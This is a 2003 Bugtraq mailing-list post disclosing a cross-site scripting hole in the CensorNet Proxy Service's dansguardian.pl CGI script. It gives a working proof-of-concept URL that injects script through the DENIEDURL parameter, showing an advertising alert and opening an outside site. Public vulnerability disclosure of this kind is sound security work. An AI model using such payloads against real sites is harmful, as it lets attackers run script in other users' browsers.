
Date: Wed, 22 Oct 2003 12:51:13 +0100
From: "Richard Maudsley" <maudr001@...m.org>
To: bugtraq@...urityfocus.com, support@...lix.com, wrigd006@...m.org,
	frenw001@...m.org
Subject: CensorNet: Cross Site Scripting Vulnerability


Hello,

A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and html) to be passed to the
cgi script and displayed in the web browser.

Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk")</script>

Regards,
	Richard Maudsley


- -------------------------------------------------------------------
    This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the
       content of this email please contact abuse@...m.org
- -------------------------------------------------------------------


